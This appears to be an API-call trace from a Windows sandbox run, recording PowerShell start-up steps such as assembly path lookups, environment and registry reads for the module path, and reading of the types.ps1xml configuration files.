	[0734.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ed1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0736.457] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0736.461] CoCreateGuid (in: pguid=0x1ed8b0 | out: pguid=0x1ed8b0*(Data1=0xda119abb, Data2=0x783e, Data3=0x4340, Data4=([0]=0x80, [1]=0x16, [2]=0xcd, [3]=0x4c, [4]=0x4d, [5]=0xc8, [6]=0xd, [7]=0xf6))) returned 0x0
	[0736.463] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0736.463] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0736.463] CoTaskMemFree (pv=0x33a820) 
	[0738.057] WinSqmIsOptedIn () returned 0x0
	[0738.058] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0738.058] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.059] CoTaskMemFree (pv=0x33a820) 
	[0738.067] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0738.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.067] CoTaskMemFree (pv=0x33a820) 
	[0738.068] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0738.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.068] CoTaskMemFree (pv=0x33a820) 
	[0738.087] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0738.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.088] CoTaskMemFree (pv=0x33a820) 
	[0738.092] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0738.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.092] CoTaskMemFree (pv=0x33a820) 
	[0738.101] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0738.101] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.101] CoTaskMemFree (pv=0x33a820) 
	[0738.102] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0738.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.102] CoTaskMemFree (pv=0x33a820) 
	[0738.103] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0738.103] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0738.103] CoTaskMemFree (pv=0x33a820) 
	[0739.554] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0739.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.554] CoTaskMemFree (pv=0x33a820) 
	[0739.558] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0739.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.558] CoTaskMemFree (pv=0x33a820) 
	[0739.559] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0739.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.559] CoTaskMemFree (pv=0x33a820) 
	[0739.559] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0739.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0739.559] CoTaskMemFree (pv=0x33a820) 
	[0742.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0742.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0743.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0743.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0743.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0743.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0743.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0743.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0743.710] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0743.713] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0743.713] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0743.713] CoTaskMemFree (pv=0x33a820) 
	[0743.715] CoTaskMemAlloc (cb=0xcc) returned 0x3ea7c0
	[0743.715] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3ea7c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0743.715] CoTaskMemFree (pv=0x3ea7c0) 
	[0743.715] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed428 | out: phkResult=0x1ed428*=0x308) returned 0x0
	[0743.715] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed3ac, lpData=0x0, lpcbData=0x1ed3a8*=0x0 | out: lpType=0x1ed3ac*=0x2, lpData=0x0, lpcbData=0x1ed3a8*=0x6c) returned 0x0
	[0743.715] CoTaskMemAlloc (cb=0x70) returned 0x3809a0
	[0743.715] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed37c, lpData=0x3809a0, lpcbData=0x1ed378*=0x6c | out: lpType=0x1ed37c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ed378*=0x6c) returned 0x0
	[0743.715] CoTaskMemFree (pv=0x3809a0) 
	[0743.716] CoTaskMemAlloc (cb=0xcc) returned 0x3ea7c0
	[0743.716] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x3ea7c0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0743.716] CoTaskMemFree (pv=0x3ea7c0) 
	[0743.716] CoTaskMemAlloc (cb=0xcc) returned 0x3ea7c0
	[0743.716] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3ea7c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0743.716] CoTaskMemFree (pv=0x3ea7c0) 
	[0743.720] RegCloseKey (hKey=0x308) returned 0x0
	[0743.720] CoTaskMemAlloc (cb=0xcc) returned 0x3ea7c0
	[0743.720] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x3ea7c0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0743.720] CoTaskMemFree (pv=0x3ea7c0) 
	[0743.721] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed428 | out: phkResult=0x1ed428*=0x308) returned 0x0
	[0743.721] RegQueryValueExW (in: hKey=0x308, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed3ac, lpData=0x0, lpcbData=0x1ed3a8*=0x0 | out: lpType=0x1ed3ac*=0x0, lpData=0x0, lpcbData=0x1ed3a8*=0x0) returned 0x2
	[0743.721] RegCloseKey (hKey=0x308) returned 0x0
	[0743.727] CoTaskMemAlloc (cb=0x20c) returned 0x3d2d10
	[0743.727] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3d2d10 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0743.729] CoTaskMemFree (pv=0x3d2d10) 
	[0743.729] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ecfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0743.730] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0743.742] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0743.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.742] CoTaskMemFree (pv=0x33a820) 
	[0743.743] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0743.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0743.743] CoTaskMemFree (pv=0x33a820) 
	[0745.137] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0745.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0745.138] CoTaskMemFree (pv=0x33a820) 
	[0745.138] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0745.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0745.138] CoTaskMemFree (pv=0x33a820) 
	[0745.140] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed218 | out: phkResult=0x1ed218*=0x310) returned 0x0
	[0745.142] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x1ed22c, lpData=0x0, lpcbData=0x1ed228*=0x0 | out: lpType=0x1ed22c*=0x1, lpData=0x0, lpcbData=0x1ed228*=0x74) returned 0x0
	[0745.142] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x1ed19c, lpData=0x0, lpcbData=0x1ed198*=0x0 | out: lpType=0x1ed19c*=0x1, lpData=0x0, lpcbData=0x1ed198*=0x74) returned 0x0
	[0745.146] CoTaskMemAlloc (cb=0x78) returned 0x3809a0
	[0745.148] RegQueryValueExW (in: hKey=0x310, lpValueName="path", lpReserved=0x0, lpType=0x1ed16c, lpData=0x3809a0, lpcbData=0x1ed168*=0x74 | out: lpType=0x1ed16c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ed168*=0x74) returned 0x0
	[0745.148] CoTaskMemFree (pv=0x3809a0) 
	[0745.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0745.149] SetErrorMode (uMode=0x1) returned 0x1
	[0745.149] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ed0f0 | out: lpFileInformation=0x1ed0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0745.149] SetErrorMode (uMode=0x1) returned 0x1
	[0745.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0745.150] SetErrorMode (uMode=0x1) returned 0x1
	[0745.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed0f0 | out: lpFileInformation=0x1ed0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0745.150] SetErrorMode (uMode=0x1) returned 0x1
	[0745.154] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0745.154] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0745.154] CoTaskMemFree (pv=0x33a820) 
	[0745.155] CoTaskMemAlloc (cb=0x104) returned 0x33a820
	[0745.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x33a820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0745.155] CoTaskMemFree (pv=0x33a820) 
	[0745.156] GetACP () returned 0x4e4
	[0745.166] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0745.166] SetErrorMode (uMode=0x1) returned 0x1
	[0745.167] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0745.168] GetFileType (hFile=0x314) returned 0x1
	[0745.168] SetErrorMode (uMode=0x1) returned 0x1
	[0745.168] GetFileType (hFile=0x314) returned 0x1
	[0746.544] ReadFile (in: hFile=0x314, lpBuffer=0x2c30890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c30890*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0746.547] ReadFile (in: hFile=0x314, lpBuffer=0x2c30890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c30890*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0746.547] ReadFile (in: hFile=0x314, lpBuffer=0x2c30890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c30890*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0746.548] ReadFile (in: hFile=0x314, lpBuffer=0x2c30890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c30890*, lpNumberOfBytesRead=0x1ed028*=0xcf3, lpOverlapped=0x0) returned 1
	[0746.548] ReadFile (in: hFile=0x314, lpBuffer=0x2c2fceb, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c2fceb*, lpNumberOfBytesRead=0x1ed028*=0x0, lpOverlapped=0x0) returned 1
	[0746.548] ReadFile (in: hFile=0x314, lpBuffer=0x2c30890, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c30890*, lpNumberOfBytesRead=0x1ed028*=0x0, lpOverlapped=0x0) returned 1
	[0746.550] CloseHandle (hObject=0x314) returned 1
	[0746.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0746.553] SetErrorMode (uMode=0x1) returned 0x1
	[0746.553] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecfa0 | out: lpFileInformation=0x1ecfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0746.553] SetErrorMode (uMode=0x1) returned 0x1
	[0746.554] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1eccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0746.555] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed088 | out: phkResult=0x1ed088*=0x314) returned 0x0
	[0746.555] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed00c, lpData=0x0, lpcbData=0x1ed008*=0x0 | out: lpType=0x1ed00c*=0x1, lpData=0x0, lpcbData=0x1ed008*=0x56) returned 0x0
	[0746.555] CoTaskMemAlloc (cb=0x5a) returned 0x1b3da1b0
	[0746.555] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecfdc, lpData=0x1b3da1b0, lpcbData=0x1ecfd8*=0x56 | out: lpType=0x1ecfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecfd8*=0x56) returned 0x0
	[0746.555] CoTaskMemFree (pv=0x1b3da1b0) 
	[0746.555] RegCloseKey (hKey=0x314) returned 0x0
	[0746.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1eccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0746.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0747.878] VirtualQuery (in: lpAddress=0x1ebd70, lpBuffer=0x1ecc30, dwLength=0x30 | out: lpBuffer=0x1ecc30*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0747.891] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0747.891] GetFileType (hFile=0x314) returned 0x1
	[0747.891] SetErrorMode (uMode=0x1) returned 0x1
	[0747.891] GetFileType (hFile=0x314) returned 0x1
	[0747.892] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.892] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.892] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.893] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.894] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.895] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.895] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.895] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.895] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
	[0747.897] ReadFile (in: hFile=0x314, lpBuffer=0x2c97a50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ed028, lpOverlapped=0x0 | out: lpBuffer=0x2c97a50*, lpNumberOfBytesRead=0x1ed028*=0x1000, lpOverlapped=0x0) returned 1
